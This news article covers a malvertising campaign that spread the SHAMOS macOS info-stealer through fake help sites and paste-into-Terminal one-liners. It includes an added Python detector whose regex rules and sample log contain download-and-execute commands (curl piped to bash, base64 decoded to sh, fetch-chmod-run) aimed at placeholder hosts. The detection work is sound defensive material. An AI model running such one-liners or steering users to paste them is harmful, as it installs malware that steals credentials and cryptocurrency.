Between June and August of this year, a campaign built on off-the-shelf malware targeted more than 300 organizations. According to cybersecurity company CrowdStrike, the campaign deployed SHAMOS, a variant of the Atomic macOS Stealer (AMOS) developed by the cybercriminal group COOKIE SPIDER.
“Operating as malware-as-a-service, COOKIE SPIDER rents this information stealer to cybercriminals who deploy it to harvest sensitive information and cryptocurrency assets from victims,” says CrowdStrike, which blocked the campaign.
The cybercriminals placed advertisements purporting to come from legitimate companies in order to steer users to fraudulent macOS help websites, where victims were instructed to paste and run a malicious one-line installation command in the Terminal. CrowdStrike reports that one Google advertising profile promoting a spoofed macOS help site appeared to belong to a legitimate Australia-based electronics store, suggesting the attackers had spoofed the store’s name in their Google Ads profile. Delivering malicious content through paid advertising in this way is known as “malvertising”.
Such one-line commands let attackers sidestep Gatekeeper and install the malware directly onto victims’ devices. Gatekeeper’s checks are triggered by the com.apple.quarantine extended attribute that browsers set on downloaded files; a payload fetched with curl and piped straight into a shell never receives that attribute and so is never inspected. SHAMOS operators previously used the same method in fake Homebrew malvertising campaigns between May 2024 and January 2025, using Google ads to target macOS and Linux devices.
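The article does not reproduce the one-liner itself, so the following is an added detection example written for this page, not CrowdStrike’s code or any indicator from the campaign. It scans process command lines for the generic shape of a download-and-execute one-liner: curl or wget output piped into a shell, shell -c "$(curl ...)" command substitution, base64-decoded content piped into a shell, and fetch-then-chmod-then-run chains. The log lines, the "timestamp|user|cmdline" field layout and the example.invalid URLs are all constructed for the example; real EDR telemetry will need its own parser.

```python
"""Heuristic detector for download-and-execute one-liners in process telemetry.

Added example for this article (not CrowdStrike's tooling). Assumes a simple
pipe-delimited log layout, timestamp|user|cmdline, with cmdline as the last field
so that pipes inside the command survive the split.
"""
import re
from typing import List, NamedTuple, Optional, Tuple


class Finding(NamedTuple):
    line_no: int
    rule: str
    cmdline: str


# Rule name -> regex applied to the full command line. Shell names are matched
# with a trailing word boundary so that e.g. "| shasum" is not flagged.
SHELL = r"(sudo\s+)?(ba|z|k)?sh\b"
RULES = {
    # curl/wget output piped directly into a shell interpreter
    "download_piped_to_shell": re.compile(
        r"\b(curl|wget)\b[^|]*\|\s*" + SHELL, re.IGNORECASE),
    # sh -c "$(curl ...)" style command substitution
    "command_substitution_fetch": re.compile(
        r"\b(ba|z|k)?sh\b\s+-c\s+.*\$\(\s*(curl|wget)\b", re.IGNORECASE),
    # base64-decoded payload handed to a shell
    "base64_decoded_to_shell": re.compile(
        r"base64\s+(-d|--decode|-D)\b[^|]*\|\s*" + SHELL, re.IGNORECASE),
    # fetch, mark executable and run, all in one command line
    "chmod_then_exec": re.compile(
        r"\b(curl|wget)\b.*(;|&&)\s*chmod\s+\+x\b.*(;|&&)\s*(\./|/)", re.IGNORECASE),
}

# Constructed sample telemetry: four suspicious lines followed by two benign ones.
SAMPLE_LOG = """\
2025-06-12T10:01:03Z|alice|curl -fsSL https://example.invalid/fix.sh | bash
2025-06-12T10:02:17Z|alice|/bin/sh -c "$(curl -fsSL https://example.invalid/setup)"
2025-06-12T10:03:44Z|bob|echo aGVsbG8K | base64 -d | sh
2025-06-12T10:04:09Z|bob|curl -o /tmp/app https://example.invalid/app; chmod +x /tmp/app; /tmp/app
2025-06-12T10:05:30Z|carol|curl -fsSL https://example.invalid/data.json -o data.json
2025-06-12T10:06:02Z|carol|brew install wget
"""


def parse_line(line: str) -> Optional[Tuple[str, str, str]]:
    """Split timestamp|user|cmdline; maxsplit=2 keeps pipes inside the command."""
    parts = line.split("|", 2)
    if len(parts) != 3:
        return None
    return parts[0], parts[1], parts[2]


def scan(log_text: str) -> List[Finding]:
    """Return one Finding per (line, rule) match over the whole log text."""
    findings: List[Finding] = []
    for line_no, line in enumerate(log_text.splitlines(), start=1):
        parsed = parse_line(line)
        if parsed is None:
            continue
        _ts, _user, cmdline = parsed
        for rule, pattern in RULES.items():
            if pattern.search(cmdline):
                findings.append(Finding(line_no, rule, cmdline))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.rule}: {f.cmdline}")
```

These patterns are deliberately coarse and will also fire on legitimate installers that use the same curl-pipe-shell idiom (many developer tools do), so they are a triage signal rather than a verdict. On macOS the complementary check is whether a freshly executed binary carries the quarantine attribute at all; `xattr -p com.apple.quarantine <file>` prints it when present, and its absence on a file that was clearly just downloaded is exactly the condition under which Gatekeeper never looked at it.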
Campaign originated in Russia
Like many orchestrated cyber-attacks, this campaign appears to have originated in Russia. In one attack in June 2025, victims were served a sponsored malvertising link in their search results. Users in multiple countries, including the U.S., UK, Japan, China, Colombia, Canada, Mexico, and Italy, received these advertisements; none of the identified victims, however, were located in Russia.
According to CrowdStrike: “This is likely due to the fact that Russian eCrime forums prohibit commodity malware operators from targeting users based in Russia and other countries belonging to the Commonwealth of Independent States (CIS).”
Cybercriminals renting out off-the-shelf tools that masquerade as legitimate organizations is now an established modus operandi in the underworld. As reported by Cyber Intelligence, even global corporations such as British Airways and Microsoft are not immune from having their websites cloned by bad actors. Organized cybercriminal groups now sell scammers off-the-shelf kits for cloning the websites of major brands, and the resulting dummy sites are convincing to anyone but a trained eye. Consumers are targeted via email or smartphone messaging and told to check out “unbeatable bargains”; once they enter their bank account details, the scammers can drain their accounts. Corporate users are also increasingly targeted in order to steal company credit card details.